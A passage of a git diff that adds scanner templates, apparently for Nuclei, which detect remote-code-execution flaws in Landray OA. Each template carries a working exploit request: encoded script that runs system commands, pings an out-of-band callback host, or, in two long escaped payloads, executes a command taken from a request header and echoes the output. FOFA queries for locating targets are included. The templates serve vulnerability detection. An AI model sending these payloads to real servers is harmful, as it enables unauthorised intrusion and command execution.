b/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml @@ -0,0 +1,29 @@ +id: landray-oa-datajson-rce + +info: + name: Landray-OA - s_bean sysFormulaSimulateByJS RCE + author: SleepingBag945 + severity: critical + description: Landray-OA s_bean sysFormulaSimulateByJS RCE + reference: + - https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py + metadata: + fofa-query: app="Landray-OA系统" + tags: landray,rce + + +http: + - raw: + - | + GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection:close + + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "dns" + - "http" \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml b/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml new file mode 100755 index 0000000000..fec680dc73 --- /dev/null +++ b/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml @@ -0,0 +1,32 @@ +id: landray-oa-erp-data-rce + +info: + name: Landray-OA - erp_data.jsp RCE + author: SleepingBag945 + severity: critical + description: Landray-OA - erp_data.jsp RCE + reference: + - https://cn-sec.com/archives/1249492.html + metadata: + fofa-query: app="Landray-OA系统" + tags: landray,rce + + +http: + - raw: + - | + POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + var={"body":{"file":"/tic/core/resource/js/erp_data.jsp"}}&erpServcieName=sysFormulaValidate&script=Runtime.getRuntime().exec("ping -c 4 {{interactsh-url}}"); + + + + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "dns" + - "http" \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml new file mode 100755 index 0000000000..066c13b9da --- /dev/null +++ b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml @@ -0,0 +1,37 @@ +id: landray-oa-sysSearchMain-editParam-rce + +info: + name: Landray-OA - sysSearchMain editParam RCE + author: SleepingBag945 + severity: critical + description: Landray-OA - sysSearchMain editParam RCE + reference: + - https://www.modb.pro/db/555240 + - https://github.com/mhaskar/XMLDecoder-payload-generator + metadata: + fofa-query: app="Landray-OA系统" + tags: landray,rce + + +http: + - raw: + - | + POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + Test: echo {{randstr}} + + var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0054\u0065\u0073\u0074\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d + + matchers-condition: and + matchers: + - type: word + words: + - "Execute:" + - type: word + words: + - "{{randstr}}" + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml new file mode 100755 index 0000000000..13af3480b6 --- /dev/null +++ b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml @@ -0,0 +1,37 @@ +id: landray-oa-treexml-rce + +info: + name: Landray OA treexml.tmpl Script RCE + author: SleepingBag945 + severity: critical + reference: + - http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + tags: landray,oa,rce + +http: + - raw: + - | + POST /data/sys-common/treexml.tmpl HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Cmd: echo '{{randstr}}' + Content-Type: application/x-www-form-urlencoded + Cookie: JSESSIONID=6D85ABCAEAAAC4B3A7F95FFE2AAF6C04 + Pragma: no-cache + Accept-Encoding: gzip + + s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u006